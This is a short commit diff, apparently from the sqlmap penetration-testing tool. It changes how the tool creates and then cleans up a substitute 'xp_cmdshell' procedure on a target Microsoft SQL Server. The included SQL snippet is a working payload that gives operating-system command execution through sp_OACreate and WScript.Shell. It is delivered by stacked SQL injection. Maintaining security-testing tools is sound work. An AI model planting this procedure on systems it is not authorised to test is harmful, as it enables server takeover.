Minor update to cleanup properly new xp_cmdshell

stamparm · stamparm · commit bd99470a4ab2 · 2014-12-05T22:01:59.000+01:00
diff --git a/lib/takeover/xp_cmdshell.py b/lib/takeover/xp_cmdshell.py
@@ -52,10 +52,9 @@ def _xpCmdshellCreate(self):
             inject.goStacked(agent.runAsDBMSUser(cmd))
 
         self._randStr = randomStr(lowercase=True)
-        self._xpCmdshellNew = "xp_%s" % randomStr(lowercase=True)
-        self.xpCmdshellStr = "master..%s" % self._xpCmdshellNew
+        self.xpCmdshellStr = "master..new_xp_cmdshell"
 
-        cmd = getSQLSnippet(DBMS.MSSQL, "create_new_xp_cmdshell", RANDSTR=self._randStr, XP_CMDSHELL_NEW=self._xpCmdshellNew)
+        cmd = getSQLSnippet(DBMS.MSSQL, "create_new_xp_cmdshell", RANDSTR=self._randStr)
 
         if Backend.isVersionWithin(("2005", "2008")):
             cmd += ";RECONFIGURE WITH OVERRIDE"
diff --git a/plugins/generic/misc.py b/plugins/generic/misc.py
@@ -162,7 +162,7 @@ def cleanup(self, onlyFileTbl=False, udfDict=None, web=False):
             inject.goStacked("DROP TABLE %s" % self.cmdTblName, silent=True)
 
             if Backend.isDbms(DBMS.MSSQL):
-                return
+                udfDict = {"master..new_xp_cmdshell": None}
 
             if udfDict is None:
                 udfDict = self.sysUdfs
diff --git a/procs/mssqlserver/create_new_xp_cmdshell.sql b/procs/mssqlserver/create_new_xp_cmdshell.sql
@@ -1,3 +1,3 @@
 DECLARE @%RANDSTR% nvarchar(999);
-set @%RANDSTR%='CREATE PROCEDURE %XP_CMDSHELL_NEW%(@cmd varchar(255)) AS DECLARE @ID int EXEC sp_OACreate ''WScript.Shell'',@ID OUT EXEC sp_OAMethod @ID,''Run'',Null,@cmd,0,1 EXEC sp_OADestroy @ID';
+set @%RANDSTR%='CREATE PROCEDURE new_xp_cmdshell(@cmd varchar(255)) AS DECLARE @ID int EXEC sp_OACreate ''WScript.Shell'',@ID OUT EXEC sp_OAMethod @ID,''Run'',Null,@cmd,0,1 EXEC sp_OADestroy @ID';
 EXEC master..sp_executesql @%RANDSTR%
